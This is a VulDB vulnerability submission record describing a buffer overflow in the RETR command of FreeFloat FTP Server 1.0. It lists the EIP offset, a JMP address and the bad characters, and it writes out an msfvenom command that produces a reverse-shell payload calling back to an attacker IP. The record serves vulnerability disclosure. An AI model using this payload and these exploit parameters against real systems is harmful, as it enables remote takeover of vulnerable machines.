| タイトル | FreeFloat FTP Server 1.0 Buffer Overflow |
|---|
| 説明 | This vulnerability is found in the `RETR` command of Freefloat FTP Server 1.0.
The `RETR` command is typically used to download a file from the server.
However, when we send a `RETR` request containing 246 bytes of offset data, we overwrite the EIP (Extended Instruction Pointer).
Once the 4 bytes of the EIP are reached, we overwrite it with a JMP instruction located at address `\x74\xe3\x2f\xd9`.
After identifying a suitable JMP address, we determined the list of bad characters to be `\x00`, `\x0a`, and `\x0d`. These characters needed to be excluded from the shellcode to avoid corrupting the payload.
With the buffer structure defined, we appended a shellcode generated using Metasploit’s msfvenom tool, with the following command:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.176.136 LPORT=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
Note: We included a NOP sled consisting of 20 bytes of `0x90` (NOP instructions) before the shellcode to ensure proper alignment and stability during execution.
NOPs (No Operation instructions) act as a buffer zone, increasing the chances that the execution flow safely reaches the shellcode. This is a common technique in buffer overflow exploits.
In order for the reverse shell to work, Netcat must be running in listening mode on port 4444.
Once the exploit is successfully executed, the shellcode initiates a reverse connection, granting remote access to the vulnerable machine.
The exploit was tested in an environment running.
A version of this exploit written in Perl is available at the following GitHub address: |
|---|
| ソース | ⚠️ https://github.com/r3ng4f/FreeFloat_1/blob/main/01-exploit.txt |
|---|
| ユーザー | r3ng4f (UID 73285) |
|---|
| 送信 | 2025年05月27日 14:47 (1 年 ago) |
|---|
| モデレーション | 2025年05月29日 12:02 (2 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 310503 [FreeFloat FTP Server 1.0 RETR Command メモリ破損] |
|---|
| ポイント | 20 |
|---|